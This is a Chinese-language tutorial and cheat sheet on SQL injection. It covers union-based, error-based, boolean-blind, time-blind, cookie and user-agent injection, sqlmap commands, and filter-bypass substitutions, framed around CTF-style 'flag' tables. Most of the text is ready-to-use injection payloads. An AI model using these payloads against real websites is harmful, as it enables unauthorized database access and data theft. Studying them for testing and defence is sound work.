SQL注入及其bypass – 作者:Pretty-安全小百科

SQL注入

整数型注入

加入单引号语句出错，不会回显

加and 1=1 语句执行正常，返回一般页面

加and 1=2 语句正常运行，返回原网页，但无法查询结果

id=1 order by 1 查询数据库长度，若为2

id=-1 union select 1,2 查看回显位置，若为1，2，则可在1，2处添加查询语句

id=-1 union select 1,database() 查询数据库名，若为sqli

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schrma=’sqli’

页面返回表名，若为user

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’user’

页面返回字段名，若为id、flag

id=-1 union select 1,group_concat(flag) from sqli.user 成功！

字符型注入

id=’text’

所有插入的SQL语句会被包在单引号中，所以无效。需要用注释符注释掉后面的单引号，即–+或#

id=1’

id=1’ and 1=1 #

id=1’ and 1=2 #

id=1’ order by 1# 获取数据库长度,若为2

id=-1’ union select 1,2 # 获取回显位置，若为1

id=-1’ union select database(),2 # 获取数据库名,若为sqli

id=-1’ union select group_concat(table_name),2 from information_schema.tables where table_schema=’sqli’# 获取表名，若为flag

id=-1’ union select group_concat(column_name),2 from information_schema.columns where table_name=’flag’ # 获取字段名，若为flag

id=-1’ union select group_concat(flag),2 from sqli.flag # 成功！

报错注入

id=1’ 页面返回报错信息，则存在报错注入

期间用到了这几个函数

updatexml()

updatexml(1,(concat(0x7e,(select…),0x7e)),1)

但是这个函数只能返回最多32位的值，且对mysql的版本有要求

1 Union select

count(*),concat(database(),0x26,floor(rand(0)*2))x from information_schema.columns group by x;

concat(str1,str2,…)函数，返回所有参数连接的成的字符串。若有一个参数值为NULL，则返回NULL

count(*)函数：返回选择的行数

floor函数：返回获得的小于或大于数值表达式的最大整数

rand()函数，返回一个随机的数介于0-1之间

布尔盲注

id=1 id=1’ 页面只返回yes or no

不会有其他任何的信息

手动注入：

id=1 and length(database())>= n

判断数据库名长度

id=1 and substr(database(),1,1)=’t’

判断第一位的字母

id=1 and substr((select table_name from information_schema.tables and table_schema=’’),1,1)=’’

判断表明，以此类推。但是此法实在是太麻烦而且麻烦了，所以考虑其他方法

python

get_data()

burp suite

时间盲注

id=1 id=1’页面不会返回任何值

手动注入：

if(length(database)>2,sleep(5),1)

可以根据burp观察返回时长

if(substr(database(),1,1)=’a’,sleep(5),1)

sqlmap

cookie注入

cookie注入中URL中没有get参数，可以通过burp suite 抓包，查看cookie中是否含有id=1类的参数，若有，则存在cookie注入

手动注入：

通过在burp中的repeater模块修改cookie里的id=1，和一般的注入相同

sqlmap：

sqlmap -u “http://text.cn/” –cookie “id=1” –level 2 –dbs

当把等级升为2或2以上时sqlmap会尝试注入cookie参数

UA注入

user-agent：是一个特殊字符串头，使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。

原理：浏览器未对user-agent参数进行过滤，因此就可以通过修改user-agent参数来进行攻击

当把等级升为3或3以上时sqlmap会尝试注入user-agent

sqlmap 直接破解

sqlmap -u “url/” –level 3 –dbs

用burp suite抓包

将抓到的包放在abc.txt文件中，放入sqlmap文件路径下，然后进行破解

sqlmap -u “abc.txt” –level 3 –dbs

bypass

常用函数

system user() 系统用户名

concat() 连接字符串

user() 用户名

concat_ws() 含有分隔符地连接字符串

current_user() 当前用户名

group_concat() 连接一个组的所有字符串，并以逗号分隔每一条数据

session_user() 连接数据库的用户名

load_file() 读取本地文件

database() 数据库名

into outfile 写文件

version() 数据库版本

ascii() 字符串的ASCII码值

@@datadir 数据库路径

ord() 返回字符串第一个字符的 ASCII码值

@@basedir 数据库安装路径

mid() 返回一个字符串的一部分

@@version_compile_os 操作系统

substr() 返回一个字符串的一部分

count() 返回执行结果数量

length() 返回字符串的长度

substring 取值函数

div 除法运算函数和/ 用法一样

mod: 取余数函数hex():获取16进制的值

替换函数

罕见函数	替代函数	作用
concat_ws()	group_concat()、concat()	拼接select concat_wa()
char_length()、character_length()	length()	计算字符串长度select char_length()
@@datadir		服务器位置
@@basedir		服务器安装位置
and 1 div 1 and 1 div 0	and 1=1 and 1=2	判断是否存在sql注入
like、*
hex(0)、hex(1)

-1.0union–+/!abc/%0Aselect	union select	%0A换行符 .0、%20代替空格
-1.0union–+hex(0)%0Aselect%20	union select	%0A换行符 .0、%20代替空格
&、%26、or、\|\|、1^1^0、1^0^0、{‘’1=1}	and
like，regexp，liker ，<>，！=等	=
xor，&，^，\|\|	or
and @s1ye:= length(database/**/())